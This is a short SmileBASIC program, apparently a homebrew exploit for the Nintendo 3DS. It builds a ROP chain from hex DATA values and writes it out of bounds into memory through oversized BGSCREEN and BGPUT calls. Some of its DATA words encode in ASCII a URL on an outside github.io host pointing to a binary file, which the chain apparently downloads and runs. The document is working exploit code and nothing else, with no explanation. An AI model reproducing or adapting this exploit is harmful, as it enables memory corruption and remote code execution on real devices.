IF HARDWARE==1 THEN
   CODE_LINEAR_BASE=&H30000000+&H07C00000-&H00100000
ELSE 
   CODE_LINEAR_BASE=&H30000000+&H04000000-&H00100000
ENDIF


DATA &HDEADC0DE, &H13341C, &H94500D3, &H109924, &H1E6790, &H10ECA4, &H94500A0, &H1C15D8, &HDEADC0DE, &H94500D7, &HDAFC9754, &H115D5C, &H248720, &H94500DB, &H9450108, &H1DFECC, &H9450074, &H256D78, &H109924, &H2554DC, &H1000, &H248A8C, &HDEADC0DE, &H1FBA38, &H70747468, &H6D2F2F3A, &H61626E72, &H2E686F79, &H68746967, &H692E6275, &H61622F6F, &H73636973, &H696F6C70, &H73752F74, &H3132335F, &H725F642F, &H622E706F, &H6E69


DIM ROP[&H27]
ROP[0]=CODE_LINEAR_BASE

FOR I=1 TO &H26
   READ ROP[I]
NEXT

BGSCREEN 0,134217728,16

ROP_COPYBASE_X = 406873
ROP_COPYBASE_Y = 7

ROP_LENGTH = LEN(ROP)

I=0
J=ROP_COPYBASE_Y
X=ROP_COPYBASE_X

WHILE I < ROP_LENGTH
  WHILE I < ROP_LENGTH AND J >= 0
    WORD=SHIFT(ROP)
    BGPUT 0,X,J,WORD
    DEC J
    BGPUT 0,X,J,WORD>>16
    DEC J
    INC I
  WEND
  INC X
  J=15
WEND

BGPUT 0,4759,2,"0017"
BGPUT 0,4759,3,"0D28"

FILL ROP,0

END